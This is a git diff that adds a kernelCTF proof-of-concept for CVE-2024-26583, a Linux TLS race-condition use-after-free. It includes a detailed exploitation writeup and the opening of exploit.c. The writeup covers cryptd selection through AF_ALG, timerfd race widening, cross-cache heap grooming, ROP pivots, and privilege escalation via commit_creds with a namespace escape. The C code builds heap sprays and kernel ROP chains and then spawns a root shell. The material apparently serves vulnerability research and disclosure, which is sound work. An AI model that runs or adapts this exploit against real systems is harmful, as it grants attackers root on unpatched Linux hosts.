diff --git a/pocs/linux/kernelctf/CVE-2024-26583_cos/docs/exploit.md b/pocs/linux/kernelctf/CVE-2024-26583_cos/docs/exploit.md new file mode 100644 index 000000000..d42006455 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-26583_cos/docs/exploit.md @@ -0,0 +1,259 @@ +## Setup + +To trigger the TLS encryption we must first configure the socket. +This is done using the setsockopt() with SOL_TLS option: + +``` + static struct tls12_crypto_info_aes_ccm_128 crypto_info; + crypto_info.info.version = TLS_1_2_VERSION; + crypto_info.info.cipher_type = TLS_CIPHER_AES_CCM_128; + + if (setsockopt(sock, SOL_TLS, TLS_TX, &crypto_info, sizeof(crypto_info)) < 0) + err(1, "TLS_TX"); + +``` + +This syscall triggers allocation of TLS context objects which will be important later on during the exploitation phase. + +In KernelCTF config PCRYPT (parallel crypto engine) is disabled, so our only option to trigger async crypto is CRYPTD (software async crypto daemon). + +Each crypto operation needed for TLS is usually implemented by multiple drivers. +For example, AES encryption in CBC mode is available through aesni_intel, aes_generic or cryptd (which is a daemon that runs these basic synchronous crypto operations in parallel using an internal queue). + +Available drivers can be examined by looking at /proc/crypto, however those are only the drivers of the currently loaded modules. Crypto API supports loading additional modules on demand. + +As seen in the code snippet above we don't have direct control over which crypto drivers are going to be used in our TLS encryption. +Drivers are selected automatically by Crypto API based on the priority field which is calculated internally to try to choose the "best" driver. + +By default, cryptd is not selected and is not even loaded, which gives us no chance to exploit vulnerabilities in async operations. + +However, we can cause cryptd to be loaded and influence the selection of drivers for TLS operations by using the Crypto User API. This API is used to perform low-level cryptographic operations and allows the user to select an arbitrary driver. + +The interesting thing is that requesting a given driver permanently changes the system-wide list of available drivers and their priorities, affecting future TLS operations. + +Following code causes AES CCM encryption selected for TLS to be handled by cryptd: + +``` + struct sockaddr_alg sa = { + .salg_family = AF_ALG, + .salg_type = "skcipher", + .salg_name = "cryptd(ctr(aes-generic))" + }; + int c1 = socket(AF_ALG, SOCK_SEQPACKET, 0); + + if (bind(c1, (struct sockaddr *)&sa, sizeof(sa)) < 0) + err(1, "af_alg bind"); + + struct sockaddr_alg sa2 = { + .salg_family = AF_ALG, + .salg_type = "aead", + .salg_name = "ccm_base(cryptd(ctr(aes-generic)),cbcmac(aes-aesni))" + }; + + if (bind(c1, (struct sockaddr *)&sa2, sizeof(sa)) < 0) + err(1, "af_alg bind"); +``` + +## What we start with and what can we do + +If we win the race condition, vulnerability gives us a limited write primitive. +To be exact, it gives us an ability to change a 8 bit integer value of '1' to '0' at an offset 0x158 in the struct tls_sw_context_rx object which is allocated from a general kmalloc-512 cache. + +The big problem is finding a victim object in which this limited write gives us the ability to escalate privileges or at least get a better exploitation primitive. + +## Victim object + +We had no success looking for kmalloc-512 objects, so we had to turn our attention to objects from other caches, even though it requires a cross-cache attack. + +The only object we were able to find is ipcomp_tfms: + +``` +struct ipcomp_tfms { + struct list_head list; /* 0 0x10 */ + struct crypto_comp * * tfms; /* 0x10 0x8 */ + int users; /* 0x18 0x4 */ + + /* size: 32, cachelines: 1, members: 3 */ +}; +``` + +This is used in XFRM code. Changing the reference counter 'users' from 1 to 0 gives us a use-after-free. + +Unfortunately, only one object can be created for the whole system, so there is no way to spray the whole page with these objects. + +There 128 possible positions of this object in the kmalloc-128 slab and 16 positions of rx context in kmalloc-512. + +Only a few of these combinations align with the 0x158 offset giving us a chance to perform the attack. + +``` +Target: 0x158 (base: 0x0) victim(ipcomp_tfms): 0x158 (base: 0x140) +Target: 0x358 (base: 0x200) victim(ipcomp_tfms): 0x358 (base: 0x340) +Target: 0x558 (base: 0x400) victim(ipcomp_tfms): 0x558 (base: 0x540) +Target: 0x758 (base: 0x600) victim(ipcomp_tfms): 0x758 (base: 0x740) +Target: 0x958 (base: 0x800) victim(ipcomp_tfms): 0x958 (base: 0x940) +Target: 0xb58 (base: 0xa00) victim(ipcomp_tfms): 0xb58 (base: 0xb40) +Target: 0xd58 (base: 0xc00) victim(ipcomp_tfms): 0xd58 (base: 0xd40) +Target: 0xf58 (base: 0xe00) victim(ipcomp_tfms): 0xf58 (base: 0xf40) +``` + +Another issue is that kmalloc-32 uses order 0 pages, while kmalloc-512 uses order 1. + +This means we not only have to discard the slab page back to the page allocator, but also move it from the PCP to the buddy allocator and arrange the state of the allocator so that order 1 page is returned for an order 0 request. + +All those issues combined resulted in a very unreliable exploit, however it was reliable enough to eventually get the flag. + +## Triggering use-after-free through race condition + +``` + spin_lock_bh(&ctx->decrypt_compl_lock); + if (!atomic_dec_return(&ctx->decrypt_pending)) +[1] complete(&ctx->async_wait.completion); +[2] spin_unlock_bh(&ctx->decrypt_compl_lock); +} +``` + +To exploit the race condition we have to hit window between lines [1] and [2] and perform following actions: +1. Close the socket to free tls context (struct tls_sw_context_rx), leading to discard of the slab page +2. Allocate a new page table in place of the tls context. + +To hit this small window and extend it enough to fit our allocations we turn to a well-known timerfd technique invented by Jann Horn. +The basic idea is to set hrtimer based timerfd to trigger a timer interrupt during our race window and attach a lot (as many as RLIMIT_NOFILE allows) of epoll watches to this timerfd to make the time needed to handle the interrupt longer. +For more details see the original [blog post](https://googleprojectzero.blogspot.com/2022/03/racing-against-clock-hitting-tiny.html). + +Exploitation is done in 2 threads - main process runs on CPU 0, and a new thread (child_recv()) is cloned for each attempt and bound to CPU 1 + +| CPU 0 | CPU 1 | +| -------- | -------- | +| allocate tls context | - | +| - | exploit calls recv() triggering async crypto ops | +| - | tls_sw_recvmsg() waits on completion | +| - | cryptd calls tls_decrypt_done() | +| - | tls_decryption_done() finishes complete() call | +| - | timer interrupts tls_decrypt_done() | +| recv() returns to userspace unlocking the socket | timerfd code goes through all epoll notifications | +| exploit calls close() to free tls context | ... | +| exploit allocates a page table in place of tls context| ... | +| - | interrupt finishes and returns control to tls_decrypt_done() | +| - | spin_unlock_bh() writes to PTE | + + +## Ensuring the slab page is discarded + +struct tls_sw_context_rx is allocated from kmalloc-512. This cache uses a single page slab storing 16 objects. +To ensure the slab page is discarded we have to meet the same requirements as in a cross-cache attack: + +- all objects in the same slab as tls_sw_context_rx must be freed. All neighbouring objects are xattrs from the same kmalloc-512 cache and are freed before starting the race condition, which freezes the slab and puts it on a per cpu partial list +- per cpu partial list must be full to unfreeze the slab after tls context is freed +- per node partial list must also be full for the slab to be discarded instead of moved to the per node list + +All these requirements are met before tls context is freed by freeing enough kmalloc-512 xattrs. + + +## Moving the order-1 page from PCP to buddy allocator + +If we free more than pages then 'high' limit of the given PCP cache, a batch of pages will be released back to the buddy allocator: + +``` + if (pcp->count >= high) { + int batch = READ_ONCE(pcp->batch); + + free_pcppages_bulk(zone, nr_pcp_free(pcp, high, batch), pcp); + } +} +``` + +To be able to do this efficiently in the race condition window we free pages exactly up to the limit, so that the discard of the slab page immediately triggers free_pcppages_bulk(). +The information we need about the current state of the PCP comes from [reading the zoneinfo file](../CVE-2024-26582_lts/docs/novel-techniques.md##predicting-how-much-we-have-to-allocate-free-to-trigger-pcp-flush). + +## Allocating an order 1 page + +As long as there are no order 0 pages available, buddy allocator will return the order 1 page that was recently moved from the PCP. + +We just have to allocate enough objects from order 0 slab like kmalloc-256, but if we allocate too much, buddy allocator will split some higher order pages and order 0 count might increase instead. + +Fortunately, we can parse the [buddyinfo](novel-techniques.md) file to get the zone counts we need. + +## Triggering the use-after-free after 'users' field change + +At this point our users field was changed from 1 to 0 (this is stage2() in the exploit). + +This field is a reference counter, but doesn't use the refcount_t type, so there are no protections against invalid values. + +Code checking if the object is used is very simple: +``` +static void ipcomp_free_tfms(struct crypto_comp * __percpu *tfms) +{ + struct ipcomp_tfms *pos; + int cpu; + + list_for_each_entry(pos, &ipcomp_tfms_list, list) { + if (pos->tfms == tfms) + break; + } + + WARN_ON(list_entry_is_head(pos, &ipcomp_tfms_list, list)); + +[1] if (--pos->users) + return; + + list_del(&pos->list); + kfree(pos); + + if (!tfms) + return; + + for_each_possible_cpu(cpu) { + struct crypto_comp *tfm = *per_cpu_ptr(tfms, cpu); + crypto_free_comp(tfm); + } + +} +``` + +If 'users' is equal to 1, objects are freed. + +Right now our counter is at 0, but we can just allocate another XFRM SA to increase this count to 1 and then perform the delete, freeing the object while still in use. + +## Getting RIP control + +When ipcomp_tfms is freed, all crypto context is freed as well, including struct crypto_alg which contains struct compress_alg: + +``` +struct compress_alg { + int (*coa_compress)(struct crypto_tfm *, const u8 *, unsigned int, u8 *, unsigned in +t *); /* 0 0x8 */ + int (*coa_decompress)(struct crypto_tfm *, const u8 *, unsigned int, u8 *, unsigned +int *); /* 0x8 0x8 */ + + /* size: 16, cachelines: 1, members: 2 */ +}; +``` + + +These function pointers are called to compress/decompress network data on sockets configured with XFRM ipcomp. + +If we allocate our payload in place of this object, we can trigger code execution by calling sendmsg() on our XFRM socket. + +## Pivot to ROP + +At this point RSI contains a pointer to our data, so we only need 2 gadgets to pivot to ROP: +``` +push rsi +jmp qword ptr [rsi+0xf] +``` + +and + +``` +pop rsp +``` + +## Second pivot + +At this point we have full ROP and enough space available, but our standard privilege escalation payload relies on ROP being at a known location, so we choose an unused read/write area in the kernel and use copy_user_generic_string() to copy the second stage ROP from userspace to that area. +Then we use a `pop rsp ; ret` gadget to pivot there. + +## Privilege escalation + +The execution is happening in the context of a syscall this time, so it's easy to escalate privileges with standard commit_creds(init_cred); switch_task_namespaces(pid, init_nsproxy); sequence and return to the root shell. + diff --git a/pocs/linux/kernelctf/CVE-2024-26583_cos/docs/novel-techniques.md b/pocs/linux/kernelctf/CVE-2024-26583_cos/docs/novel-techniques.md new file mode 100644 index 000000000..e1a0dcc69 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-26583_cos/docs/novel-techniques.md @@ -0,0 +1,14 @@ +## Determining the state of the buddy allocator by parsing /proc/buddyinfo + +Linux kernel exposes statistics about each memory zone in a world-readable /proc/buddyinfo. +For example: +``` +Node 0, zone DMA 0 0 0 0 0 0 0 1 +Node 0, zone DMA32 4 2 1 1 3 2 3 2 +Node 0, zone Normal 0 1 0 2 2 2 2 3 +``` + +This means there are 4 order 0 pages, 3 order 1 pages, etc. + +This is very useful when exploit needs to manipulate the buddy allocator to be able to get the target page even if it is not an exact match for the currently requested page (e.g. different order) + diff --git a/pocs/linux/kernelctf/CVE-2024-26583_cos/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2024-26583_cos/docs/vulnerability.md new file mode 100644 index 000000000..0fb28fd57 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-26583_cos/docs/vulnerability.md @@ -0,0 +1,49 @@ +## Requirements to trigger the vulnerability + +- Kernel configuration: CONFIG_TLS and one of [CONFIG_CRYPTO_PCRYPT, CONFIG_CRYPTO_CRYPTD] +- User namespaces required: no + +## Commit which introduced the vulnerability + +https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0cada33241d9de205522e3858b18e506ca5cce2c + +## Commit which fixed the vulnerability + +https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=aec7961916f3f9e88766e2688992da6980f11b8d + +## Affected kernel versions + +Introduced in 4.20. Fixed in 6.1.78, 5.15.159 and other stable trees. + +## Affected component, subsystem + +net/tls + +## Description + +TLS decryption works by calling recvmsg() on a TLS configured socket. +This will retrieve an encrypted message from the network stack and perform decryption. +AEAD decryption work is submitted to the crypto subsystem in tls_do_decryption(), setting tls_decrypt_done() as a callback and calling crypto_aead_decrypt(). + +If decryption is done asynchronously, crypto_aead_decrypt() returns immediately with EINPROGRESS value instead of waiting. +Execution then returns to tls_sw_recvmsg() which waits for the async crypto operations to be done using a completion mechanism. + +When decryption is finished, the crypto subsystem calls tls_decrypt_done() callback function, which calls complete() allowing tls_sw_recvmsg() to exit. When recvmsg() returns, the socket is no longer locked and it is now possible to close it, which causes all associated objects to be freed. + +Relevant tls_decrypt_done() code: + +``` +... + spin_lock_bh(&ctx->decrypt_compl_lock); + if (!atomic_dec_return(&ctx->decrypt_pending)) +[1] complete(&ctx->async_wait.completion); +[2] spin_unlock_bh(&ctx->decrypt_compl_lock); +} + +``` + +The bug is a race condition - calling complete at [1] allows the socket to be closed, which causes the ctx object to be freed, but ctx is later used as an argument to spin_unlock_bh() + +If an attacker manages to close the socket and reallocate freed ctx with controlled data between points [1] and [2], he can manipulate memory using spin_unlock_bh(). + +This is a very limited write primitive, as it only allows changing an 8 bit integer value of 1 to 0 at a fixed position in memory (spinlock is basically a 32 bit unsigned integer with the least significant byte used for the actual lock value). diff --git a/pocs/linux/kernelctf/CVE-2024-26583_cos/exploit/cos-105-17412.226.68/Makefile b/pocs/linux/kernelctf/CVE-2024-26583_cos/exploit/cos-105-17412.226.68/Makefile new file mode 100644 index 000000000..8752fd33f --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-26583_cos/exploit/cos-105-17412.226.68/Makefile @@ -0,0 +1,9 @@ +INCLUDES = +LIBS = -pthread -ldl -lm +CFLAGS = -fomit-frame-pointer -static -fcf-protection=none + +exploit: exploit.c kernelver_17412.226.68.h + gcc -o $@ exploit.c $(INCLUDES) $(CFLAGS) $(LIBS) + +prerequisites: + sudo apt-get install libkeyutils-dev diff --git a/pocs/linux/kernelctf/CVE-2024-26583_cos/exploit/cos-105-17412.226.68/exploit b/pocs/linux/kernelctf/CVE-2024-26583_cos/exploit/cos-105-17412.226.68/exploit new file mode 100755 index 000000000..557a3be04 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2024-26583_cos/exploit/cos-105-17412.226.68/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2024-26583_cos/exploit/cos-105-17412.226.68/exploit.c b/pocs/linux/kernelctf/CVE-2024-26583_cos/exploit/cos-105-17412.226.68/exploit.c new file mode 100644 index 000000000..67263b1dd --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-26583_cos/exploit/cos-105-17412.226.68/exploit.c @@ -0,0 +1,1747 @@ +#define _GNU_SOURCE + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include "kernelver_17412.226.68.h" + +#define INTERVAL1 25 + +static char *g_mmapped_buf; +static char *g_bigbuf; +static int g_sock_key; +static int g_sock_xfrm; +static uint64_t g_kernel_text; +static char g_leak_buf[0x10000]; +static int g_debug; +static int g_delay; +static int g_event1; +static int g_event2; +static unsigned int g_before2_cnt; + +#ifdef DEBUG +#define err(errcode, msg, ...) \ + do { \ + perror(msg); \ + sleep(1000); \ + } while (0) +#define errx(errcode, msg, ...) \ + do { \ + puts(msg); \ + sleep(1000); \ + } while (0) +#endif + +/* Netlink code based on syzcaller generated snippets */ +struct nlmsg { + char* pos; + int nesting; + struct nlattr* nested[8]; + char buf[0x30000]; +}; +static struct nlmsg nlmsg; + + +static void netlink_init(struct nlmsg* nlmsg, int typ, int flags, + const void* data, int size) +{ + memset(nlmsg, 0, sizeof(*nlmsg)); + struct nlmsghdr* hdr = (struct nlmsghdr*)nlmsg->buf; + hdr->nlmsg_type = typ; + hdr->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | flags; + memcpy(hdr + 1, data, size); + nlmsg->pos = (char*)(hdr + 1) + NLMSG_ALIGN(size); +} + +static void netlink_attr(struct nlmsg* nlmsg, int typ, const void* data, + int size) +{ + struct nlattr* attr = (struct nlattr*)nlmsg->pos; + + attr->nla_len = sizeof(*attr) + size; + + if (nlmsg->pos - nlmsg->buf + attr->nla_len > sizeof(nlmsg->buf)) + errx(1, "Netlink buffer overflow, increase size in struct nlmsg\n"); + + attr->nla_type = typ; + if (size > 0) + memcpy(attr + 1, data, size); + nlmsg->pos += NLMSG_ALIGN(attr->nla_len); +} + +static void netlink_nest(struct nlmsg* nlmsg, int typ) +{ + struct nlattr* attr = (struct nlattr*)nlmsg->pos; + attr->nla_type = typ | NLA_F_NESTED; + nlmsg->pos += sizeof(*attr); + nlmsg->nested[nlmsg->nesting++] = attr; +} + +static void netlink_done(struct nlmsg* nlmsg) +{ + struct nlattr* attr = nlmsg->nested[--nlmsg->nesting]; + + if (nlmsg->pos - (char *) attr > 0xffff) + errx(1, "Netlink attribute max size exceeded\n"); + + attr->nla_len = nlmsg->pos - (char*)attr; +} + +static int netlink_send_ext(struct nlmsg* nlmsg, int sock, uint16_t reply_type, + int* reply_len, bool dofail) +{ + if (nlmsg->pos > nlmsg->buf + sizeof(nlmsg->buf) || nlmsg->nesting) + err(1, "netlink_send_ext error"); + + struct nlmsghdr* hdr = (struct nlmsghdr*)nlmsg->buf; + hdr->nlmsg_len = nlmsg->pos - nlmsg->buf; + + struct sockaddr_nl addr; + memset(&addr, 0, sizeof(addr)); + addr.nl_family = AF_NETLINK; + + ssize_t n = sendto(sock, nlmsg->buf, hdr->nlmsg_len, 0, + (struct sockaddr*)&addr, sizeof(addr)); + + if (n != (ssize_t)hdr->nlmsg_len) { + if (dofail) + err(1, "netlink_send_ext error"); + return -1; + } + + n = recv(sock, nlmsg->buf, sizeof(nlmsg->buf), 0); + if (reply_len) + *reply_len = 0; + + if (n < 0) { + if (dofail) + err(1, "netlink_send_ext error"); + return -1; + } + if (n < (ssize_t)sizeof(struct nlmsghdr)) { + errno = EINVAL; + if (dofail) + err(1, "netlink_send_ext error"); + return -1; + } + if (hdr->nlmsg_type == NLMSG_DONE) + return 0; + + if (reply_len && hdr->nlmsg_type == reply_type) { + *reply_len = n; + return 0; + } + if (n < (ssize_t)(sizeof(struct nlmsghdr) + sizeof(struct nlmsgerr))) { + errno = EINVAL; + if (dofail) + err(1, "netlink_send_ext error"); + return -1; + } + if (hdr->nlmsg_type != NLMSG_ERROR) { + errno = EINVAL; + if (dofail) + err(1, "netlink_send_ext error"); + return -1; + } + + errno = -((struct nlmsgerr*)(hdr + 1))->error; + return -errno; +} + +static int netlink_send(struct nlmsg* nlmsg, int sock) +{ + return netlink_send_ext(nlmsg, sock, 0, NULL, false); +} + +/* End of syzkaller code */ + +static void netlink_device_change(struct nlmsg* nlmsg, int sock, + const char* name, bool up, const char* master, + const void* mac, int macsize, + const char* new_name) +{ + struct ifinfomsg hdr; + memset(&hdr, 0, sizeof(hdr)); + + if (up) + hdr.ifi_flags = hdr.ifi_change = IFF_UP; + + hdr.ifi_index = if_nametoindex(name); + + netlink_init(nlmsg, RTM_NEWLINK, 0, &hdr, sizeof(hdr)); + + if (new_name) + netlink_attr(nlmsg, IFLA_IFNAME, new_name, strlen(new_name)); + + if (master) { + int ifindex = if_nametoindex(master); + netlink_attr(nlmsg, IFLA_MASTER, &ifindex, sizeof(ifindex)); + } + + netlink_send(nlmsg, sock); +} + +static int netlink_add_addr(struct nlmsg* nlmsg, int sock, const char* dev, + const void* addr, int addrsize) +{ + struct ifaddrmsg hdr; + memset(&hdr, 0, sizeof(hdr)); + hdr.ifa_family = addrsize == 4 ? AF_INET : AF_INET6; + hdr.ifa_prefixlen = addrsize == 4 ? 24 : 64; + hdr.ifa_scope = RT_SCOPE_UNIVERSE; + hdr.ifa_index = if_nametoindex(dev); + netlink_init(nlmsg, RTM_NEWADDR, NLM_F_CREATE | NLM_F_REPLACE, &hdr, + sizeof(hdr)); + netlink_attr(nlmsg, IFA_LOCAL, addr, addrsize); + netlink_attr(nlmsg, IFA_ADDRESS, addr, addrsize); +uint32_t flags = IFA_F_NODAD; + netlink_attr(nlmsg, IFA_FLAGS, &flags, sizeof(flags)); + return netlink_send(nlmsg, sock); +} + +static int netlink_del_addr(struct nlmsg* nlmsg, int sock, const char* dev, + const void* addr, int addrsize, int prefix_size) +{ + struct ifaddrmsg hdr; + memset(&hdr, 0, sizeof(hdr)); + hdr.ifa_family = addrsize == 4 ? AF_INET : AF_INET6; + hdr.ifa_prefixlen = prefix_size; + hdr.ifa_scope = RT_SCOPE_UNIVERSE; + hdr.ifa_index = if_nametoindex(dev); + netlink_init(nlmsg, RTM_DELADDR, 0, &hdr, + sizeof(hdr)); + netlink_attr(nlmsg, IFA_ADDRESS, addr, addrsize); + return netlink_send(nlmsg, sock); +} + +static void netlink_add_addr4(struct nlmsg* nlmsg, int sock, const char* dev, + const char* addr) +{ + struct in_addr in_addr; + inet_pton(AF_INET, addr, &in_addr); + int err = netlink_add_addr(nlmsg, sock, dev, &in_addr, sizeof(in_addr)); + if (err < 0) { + } +} + +static void netlink_add_addr6(struct nlmsg* nlmsg, int sock, const char* dev, + const char* addr) +{ + struct in6_addr in6_addr; + inet_pton(AF_INET6, addr, &in6_addr); + int err = netlink_add_addr(nlmsg, sock, dev, &in6_addr, sizeof(in6_addr)); + if (err < 0) { + } +} + +static void setup_network(char *link_name) +{ + int sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE); + if (sock == -1) + exit(1); + + netlink_device_change(&nlmsg, sock, "lo", true, 0, NULL, 0, link_name); + + netlink_add_addr6(&nlmsg, sock, "lo", "2001:0db8:0:f101::1/64"); + struct in6_addr in6; + memset(&in6, 0, sizeof(in6)); + *(((char *) (&in6)) + 15) = 1; + + netlink_del_addr(&nlmsg, sock, "lo", &in6, sizeof(in6), 128); + + close(sock); + +} + + + +void set_cpu(int cpu) +{ + cpu_set_t cpus; + CPU_ZERO(&cpus); + CPU_SET(cpu, &cpus); + if (sched_setaffinity(0, sizeof(cpu_set_t), &cpus) < 0) { + perror("setaffinity"); + exit(1); + } +} + +void set_cpu_all() +{ + cpu_set_t cpus; + CPU_ZERO(&cpus); + for (int i = 0; i < 4; i++) + { + CPU_SET(i, &cpus); + } + if (sched_setaffinity(0, sizeof(cpu_set_t), &cpus) < 0) { + perror("setaffinity"); + exit(1); + } +} + +void get_kctf_flag() +{ + char buf[512]; + + + int fd = open("/flag", O_RDONLY); + + if (fd < 0) + return; + + size_t n = read(fd, buf, sizeof(buf)); + if (n > 0) { + printf("Flag:\n"); + + write(1, buf, n); + + printf("\n"); + } + + close(fd); +} + +static char *g_sh_argv[] = {"sh", NULL}; + +static int g_status; + +#define MMAP_SIZE 0x8000 + +static int g_pwned; +static char *g_rop2; +static size_t g_rop2_len; + +#define ROP2_CONST_AREA 0x10 +#define ROP2_CONST_OFFSET 0x200 + +uint64_t kaddr(uint64_t addr) +{ + return g_kernel_text + addr - 0xffffffff81000000uL; +} + + +void __attribute__((naked)) after_pwn() +{ +// Fix user stack and recover eflags since we didn't do when returning from kernel mode + asm volatile( + "mov %0, %%rsp\n" + :: "r" (g_mmapped_buf + MMAP_SIZE - 0x100) + ); + + g_pwned = 1; + + + set_cpu(1); + + int pid = fork(); + + if (!pid) { + + if (setns(open("/proc/1/ns/mnt", O_RDONLY), 0) < 0) + perror("setns"); + + setns(open("/proc/1/ns/pid", O_RDONLY), 0); + setns(open("/proc/1/ns/net", O_RDONLY), 0); + + printf("\nGot root!!!\n"); + printf("Getting kctf flags ...\n"); + + get_kctf_flag(); + + printf("Launching shell, system will crash when you exit because I didn't bother with recovery ...\n"); + execve("/bin/sh", g_sh_argv, NULL); + _exit(0); + } + + waitpid(pid, &g_status, 0); + + + + printf("Shell exited, sleeping for 30 seconds, after that system might crash\n"); + + sleep(30); + _exit(0); +} + +int setup_namespaces() +{ + char *uid_map; + char *gid_map; + int ret, map; + uid_t uid = getuid(); + uid_t gid = getgid(); + + if (unshare(CLONE_NEWUSER|CLONE_NEWNS|CLONE_NEWNET)) { + perror("unshare"); + exit(1); + } + + map = open("/proc/self/setgroups", O_WRONLY); + ret = write(map, "deny", 4); + + if (ret < 4) { + perror("setgroups write"); + exit(1); + } + + close(map); + + asprintf(&uid_map, "0 %d 1\n", uid); + size_t len = strlen(uid_map); + + map = open("/proc/self/uid_map", O_WRONLY); + + ret = write(map, uid_map, len); + + if (ret < (int) len) { + perror("uid map write"); + exit(1); + } + close(map); + + asprintf(&gid_map, "0 %d 1\n", gid); + map = open("/proc/self/gid_map", O_WRONLY); + ret = write(map, gid_map, len); + + if (ret < (int) len) { + perror("gid map write"); + exit(1); + } + + close(map); + + if (mount("tmpfs", "/tmp", "tmpfs", 0, NULL)) { + perror("mount"); + exit(1); + } +} + +void rop_rax2rdi(uint64_t **rop_p) +{ + uint64_t *rop = *rop_p; + + *(uint64_t *) (g_rop2+ROP2_CONST_OFFSET) = kaddr(POP_RDI); // RCX == RW_BUFFER + +// rax -> rdi + *rop++ = kaddr(POP_RCX); + *rop++ = kaddr(RW_BUFFER+ROP2_CONST_OFFSET); + *rop++ = kaddr(PUSH_RAX_JMP_QWORD_RCX); + + *rop_p = rop; +} + +size_t prepare_rop2(uint64_t *rop2) +{ + uint64_t *rop2_start = rop2; + + + *rop2++ = kaddr(POP_RDI); + *rop2++ = kaddr(INIT_CRED); + *rop2++ = kaddr(COMMIT_CREDS); + *rop2++ = kaddr(AUDIT_SYSCALL_EXIT); + + // Namespace escape based on code by Crusaders of Rust + *rop2++ = kaddr(POP_RDI); + *rop2++ = 1; + *rop2++ = kaddr(FIND_TASK_BY_VPID); + + *rop2++ = kaddr(POP_RSI_RDI); + *rop2++ = kaddr(INIT_NSPROXY); + *rop2++ = 0xdeadaaaa; + + rop_rax2rdi(&rop2); // clobbers RCX + + + *rop2++ = kaddr(SWITCH_TASK_NAMESPACES); + + *rop2++ = kaddr(POP_R11_R10_R9_R8_RDI_RSI_RDX_RCX); +// eflags + *rop2++ = 0; + rop2 += 6; + +// Userspace RIP + *rop2++ = (uint64_t) after_pwn; + + *rop2++ = kaddr(RETURN_VIA_SYSRET); + + return (char *) rop2 - (char *) rop2_start; +} + +void prepare_rop(char *buf) +{ + uint64_t *rop = (uint64_t *) buf; + + *(uint64_t *) (buf + 0xf) = kaddr(POP_RSP); + + +// pop 2 + *rop++ = kaddr(POP_RSI_RDI); + rop += 2; + + *rop++ = kaddr(POP_RDI_RSI_RDX_RCX); + + *rop++ = kaddr(RW_BUFFER); + *rop++ = (uint64_t) g_rop2; + *rop++ = ROP2_CONST_OFFSET + ROP2_CONST_AREA; + *rop++ = 0; + + *rop++ = kaddr(COPY_USER_GENERIC_STRING); + + *rop++ = kaddr(POP_RSP); + *rop++ = kaddr(RW_BUFFER); + + if (((char *) rop - buf) > 0xe0) + errx(1, "Stage 1 ROP too long (%d bytes)", (char *) rop - buf); + +} + +int alloc_xattr_fd_attr(int fd, char *attr, size_t size, void *buf) +{ + int res = fsetxattr(fd, attr, buf, size - 32, XATTR_CREATE); + if (res < 0) { + err(1, "fsetxattr"); + } + + return fd; +} + +int alloc_xattr_fd(int fd, unsigned int id, size_t size, void *buf) +{ + char *attr; + + asprintf(&attr, "security.%d", id); + alloc_xattr_fd_attr(fd, attr, size, buf); + + return fd; +} + +int alloc_xattr_fd2(int fd, unsigned int id, size_t name_size, size_t size, void *buf) +{ + char attr_buf[1024]; + + memset(attr_buf, 0, sizeof(attr_buf)); + strcpy(attr_buf, "security."); + + name_size -= strlen(attr_buf) + 5; + + memset(attr_buf + 9, 'a', name_size); + + sprintf(attr_buf + 9 + name_size, "%04d", id); + alloc_xattr_fd_attr(fd, attr_buf, size, buf); + + return fd; +} + +void free_xattr_fd(int fd, int id) +{ + char *attr; + + asprintf(&attr, "security.%d", id); + + fremovexattr(fd, attr); +} + + +ssize_t read_xattr_fd(int fd, int id, char *buf, size_t sz) +{ + char *attr; + + asprintf(&attr, "security.%d", id); + + ssize_t ret = fgetxattr(fd, attr, buf, sz); + + if (ret < 0) + err(1, "read_xattr_fd"); + + return ret; +} + +int alloc_xattr(unsigned int id, size_t size, void *buf) +{ + int fd; + char *fname; + + asprintf(&fname, "/tmp/xattr%d", id); + fd = open(fname, O_RDWR|O_CREAT); + if (fd < 0) + err(1, "open xattr"); + + alloc_xattr_fd_attr(fd, "security.attr", size, buf); + + return fd; +} + + +void allocate_twsock_slab() +{ + int listen_sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); + if (listen_sock < 0) + err(1, "socket"); + + struct sockaddr_in addr, client_addr; + socklen_t client_addr_sz; + + addr.sin_family = AF_INET; + addr.sin_addr.s_addr = inet_addr("127.0.0.1"); + addr.sin_port = htons(6666); + + if (bind(listen_sock, &addr, sizeof(addr)) < 0) + err(1, "bind"); + + if (listen(listen_sock, 99) < 0) + err(1, "listen"); + + int sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); + if (sock < 0) + err(1, "socket"); + + if (connect(sock, &addr, sizeof(addr)) < 0) + err(1, "connect"); + + close(sock); +} + +#define DUP_CNT 1300 +#define EPOLL_CNT 590 + +int epoll_fds[EPOLL_CNT]; +int tfd_dups[DUP_CNT]; +static int event1; + +#define MAX_ATTEMPTS 100 +#define MAX_ATTEMPTS2 20 +#define SLAB_CNT 16 +#define KMALLOC32_SLAB_CNT 128 +#define KMALLOC32_CNT KMALLOC32_SLAB_CNT*20 +#define DENTRY_SLAB_CNT 21 +#define INODE_SLAB_CNT 13 +#define PARTIAL1_CNT SLAB_CNT*14 +#define NEIGH_CNT SLAB_CNT-2 +#define BEFORE3_CNT SLAB_CNT-2 +#define PCPFLUSH_CNT 256 +#define PCPFLUSH2_CNT 1500 +#define AFTER_CNT SLAB_CNT*2 +#define NETLINK_CNT 200 +#define ORDER0_CNT SLAB_CNT*30 +#define ORDER1_CNT SLAB_CNT*500 +#define MSG_CNT 256*80 + +enum XATTR_IDX_RANGE { + NEIGHBOUR, + PARTIAL1, // 1 + KMALLOC32, + KMALLOC32_2, // 3 + ORDER0, + ORDER1, // 5 + BEFORE2, // 6 + BEFORE3, // 7 + AFTER, // 8 + PCPFLUSH, // 9 +// Has to be the last one as indexes are > 1000 + PCPFLUSH2, + XATTR_IDX_MAX +}; + 